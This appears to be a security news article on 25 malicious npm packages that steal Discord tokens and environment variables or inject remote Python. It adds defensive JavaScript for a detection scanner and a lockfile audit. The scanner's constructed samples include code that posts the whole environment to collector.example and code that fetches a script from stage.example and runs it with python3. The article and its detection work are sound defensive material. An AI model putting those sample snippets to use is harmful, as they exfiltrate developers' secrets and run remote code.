Researchers Andrey Polkovnychenko and Shachar Menashe reported that "lemaaa is a library that is supposed to be used by threat actors to influence Discord accounts. When used in a specific way, the library will hijack the secret Discord token provided to it in addition to performing the utility function requested."

Two months after 17 similar packages were taken down, another batch of 25 malicious JavaScript libraries has made its way onto the official npm package registry with the objective of obtaining Discord tokens and environment variables from infected PCs. According to DevOps security firm JFrog, which attributed the packages to novice malware writers, the libraries used a variety of techniques to imitate legitimate packages such as colors.js, crypto-js, discord.js, marked, and noblox.js.

Two of the packages, markedjs and crypto-standarts, stand out as trojanized copies: they fully replicate the functionality of the well-known libraries marked and crypto-js, so they work as expected, but they carry additional malicious code that can inject and run arbitrary Python code supplied remotely.

Environment variables, stored as key-value pairs on the development machine, hold configuration for the programming environment, which routinely includes secrets such as API access tokens, authentication keys, API URLs, and account names. Dumping the whole environment therefore hands an attacker every credential the developer's tooling had access to.
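The two behaviours described above, environment-variable theft and remote Python code injection, leave recognisable traces in package source. The following is an added example written for this article, not code from the JFrog report or from any of the listed packages: a heuristic scan that flags a read of process.env sharing a file with an outbound HTTP call, and a child_process call that launches a Python interpreter, rated higher when the same file also fetches something over the network. The three sample sources, including the hostnames collector.example and stage.example, are constructed for the example and are not reproductions of any real package.

```javascript
// Added example (not from the JFrog report or any package in the article):
// heuristic static scan for env-var exfiltration and remote Python execution.

const RULES = {
  // Any read of the process environment.
  'env-read': /process\.env\b/,
  // Serialising the entire environment at once is rarely legitimate.
  'env-dump': /JSON\.stringify\(\s*process\.env\s*\)/,
  // Outbound HTTP via core modules, fetch or axios.
  'net-out': /\b(?:https?\.(?:request|get)|fetch|axios(?:\.\w+)?)\s*\(/,
  // child_process pulled in by require or import.
  'child-proc': /(?:require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"])/,
  // A child_process call whose command starts with a Python interpreter.
  'python-exec': /\b(?:exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(\s*['"`]python3?\b/,
};

// Returns the rule ids that match and the verdicts derived from their combination.
function scanSource(source) {
  const hits = Object.keys(RULES).filter((id) => RULES[id].test(source));
  const has = (id) => hits.includes(id);
  const verdicts = [];
  if (has('env-read') && has('net-out')) verdicts.push('env-exfil');
  if (has('env-dump')) verdicts.push('env-dump');
  if (has('python-exec')) {
    verdicts.push(has('net-out') ? 'remote-python-injection' : 'spawns-python');
  }
  return { hits, verdicts };
}

// CONSTRUCTED sample sources; none of these is a real package.
const SAMPLES = {
  // Ordinary config read: process.env without any network call.
  benign: [
    "const port = Number(process.env.PORT || 3000);",
    "module.exports = (app) => app.listen(port);",
  ].join('\n'),
  // Serialises the whole environment and posts it to a collector.
  'env-stealer': [
    "const https = require('https');",
    "const payload = JSON.stringify(process.env);",
    "const req = https.request({ hostname: 'collector.example', method: 'POST', path: '/' });",
    "req.end(payload);",
  ].join('\n'),
  // Downloads a script and hands it to the local Python interpreter.
  'python-injector': [
    "const https = require('https');",
    "const { execSync } = require('child_process');",
    "https.get('https://stage.example/s.py', (res) => {",
    "  let code = '';",
    "  res.on('data', (c) => { code += c; });",
    "  res.on('end', () => execSync('python3 -c ' + JSON.stringify(code)));",
    "});",
  ].join('\n'),
};

// Scans every sample and returns { name: { hits, verdicts } }.
function scanAll(samples = SAMPLES) {
  const report = {};
  for (const [name, src] of Object.entries(samples)) report[name] = scanSource(src);
  return report;
}

for (const [name, result] of Object.entries(scanAll())) {
  console.log(name, result.verdicts.length ? result.verdicts.join(', ') : 'no findings');
}
```

Treat the output as triage input, not a verdict: a legitimate API client also reads a key from process.env and calls the network, so the benign sample shows why the env read alone is not flagged, while the combination of a full environment dump with an outbound request, or of a network fetch feeding a Python interpreter, is what separates the two malicious samples. Run it over the contents of `npm pack` output before installing an unfamiliar dependency.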

The complete list of packages follows:

  • node-colors-sync (Discord token stealer)
  • color-self (Discord token stealer)
  • color-self-2 (Discord token stealer)
  • wafer-text (Environment variable stealer)
  • wafer-countdown (Environment variable stealer)
  • wafer-template (Environment variable stealer)
  • wafer-darla (Environment variable stealer)
  • lemaaa (Discord token stealer)
  • adv-discord-utility (Discord token stealer)
  • tools-for-discord (Discord token stealer)
  • mynewpkg (Environment variable stealer)
  • purple-bitch (Discord token stealer)
  • purple-bitchs (Discord token stealer)
  • noblox.js-addons (Discord token stealer)
  • kakakaakaaa11aa (Connectback shell)
  • markedjs (Python remote code injector)
  • crypto-standarts (Python remote code injector)
  • discord-selfbot-tools (Discord token stealer)
  • discord.js-aployscript-v11 (Discord token stealer)
  • discord.js-selfbot-aployscript (Discord token stealer)
  • discord.js-selfbot-aployed (Discord token stealer)
  • discord.js-discord-selfbot-v4 (Discord token stealer)
  • colors-beta (Discord token stealer)
  • vera.js (Discord token stealer)
  • discord-protection (Discord token stealer)
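Because these packages imitated the names of popular libraries, the practical check on the defender's side is an audit of the lockfile: exact matches against the list above, names within a couple of edits of the imitated libraries, and packages that run install-time hooks. The following is an added example for this article, not code from JFrog or from the article's source: it reads the `packages` map of a lockfileVersion 2 or 3 `package-lock.json` (the `hasInstallScript` flag npm records there) and reports all three conditions. The embedded lockfile, including the package `colorz`, is constructed sample input.

```javascript
// Added example (not from the JFrog report or the article): audit a
// package-lock.json against the package list above, flag install hooks, and
// flag names that are one or two edits away from the libraries the campaign
// imitated. Assumes lockfileVersion 2 or 3 (the "packages" map).

const MALICIOUS_PACKAGES = new Set([
  'node-colors-sync', 'color-self', 'color-self-2', 'wafer-text',
  'wafer-countdown', 'wafer-template', 'wafer-darla', 'lemaaa',
  'adv-discord-utility', 'tools-for-discord', 'mynewpkg', 'purple-bitch',
  'purple-bitchs', 'noblox.js-addons', 'kakakaakaaa11aa', 'markedjs',
  'crypto-standarts', 'discord-selfbot-tools', 'discord.js-aployscript-v11',
  'discord.js-selfbot-aployscript', 'discord.js-selfbot-aployed',
  'discord.js-discord-selfbot-v4', 'colors-beta', 'vera.js',
  'discord-protection',
]);

// Legitimate libraries the malicious packages imitated, per the article.
const IMITATED = ['colors', 'crypto-js', 'discord.js', 'marked', 'noblox.js'];

// Levenshtein edit distance by dynamic programming.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                   // deletion
        dp[i][j - 1] + 1,                                   // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1), // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// "node_modules/a/node_modules/@s/b" -> "@s/b" (last segment after node_modules/).
function packageName(lockPath) {
  const parts = lockPath.split('node_modules/');
  return parts[parts.length - 1];
}

// Returns one finding per (package, reason) pair.
function auditLockfile(lock) {
  const findings = [];
  for (const [lockPath, meta] of Object.entries(lock.packages || {})) {
    if (lockPath === '') continue; // the root project's own entry
    const name = packageName(lockPath);
    if (MALICIOUS_PACKAGES.has(name)) {
      findings.push({ name, version: meta.version, reason: 'known-malicious' });
      continue;
    }
    const lookalike = IMITATED.find(
      (legit) => legit !== name && editDistance(name, legit) <= 2,
    );
    if (lookalike) {
      findings.push({ name, version: meta.version, reason: `lookalike-of:${lookalike}` });
    }
    if (meta.hasInstallScript) {
      findings.push({ name, version: meta.version, reason: 'has-install-script' });
    }
  }
  return findings;
}

// CONSTRUCTED sample lockfile; "colorz" is a made-up name, not a real finding.
const SAMPLE_LOCK = {
  name: 'sample-bot',
  lockfileVersion: 2,
  packages: {
    '': { name: 'sample-bot', version: '1.0.0' },
    'node_modules/discord.js': { version: '13.6.0' },
    'node_modules/colors': { version: '1.4.0' },
    'node_modules/lemaaa': { version: '1.0.3' },
    'node_modules/colorz': { version: '0.0.1', hasInstallScript: true },
    'node_modules/marked': { version: '4.0.12' },
    'node_modules/lemaaa/node_modules/node-fetch': { version: '2.6.7' },
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${f.name}@${f.version}: ${f.reason}`);
}
```

The lookalike check is deliberately loose and will also catch legitimately short names that happen to sit near one of the imitated libraries, so its hits need a human look; the exact-match list and the install-hook flag are the findings to act on immediately, since an install script runs with the developer's privileges the moment `npm install` completes.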

Threat actors have found Discord tokens to be a convenient way to gain unauthorized access to accounts without a password, and they use that access to spread malicious links across Discord channels. Hijacking the token the victim hands to the library is useful because it also captures tokens created when logging in to the Discord website through a web browser, not only those of the Discord app (which saves its token to local disk storage).

Finally, the researchers concluded that "it appears that beginner hackers are still abusing npm with the purpose of high ROI attacks, due to the little work involved in generating and releasing a malicious package. We assume this tendency to continue, given that our npm scanners continue to detect tens of new malicious packages every day."

For more cyber security news in crisp content, please follow our site on Twitter (@cyberworkx1) and on LinkedIn.
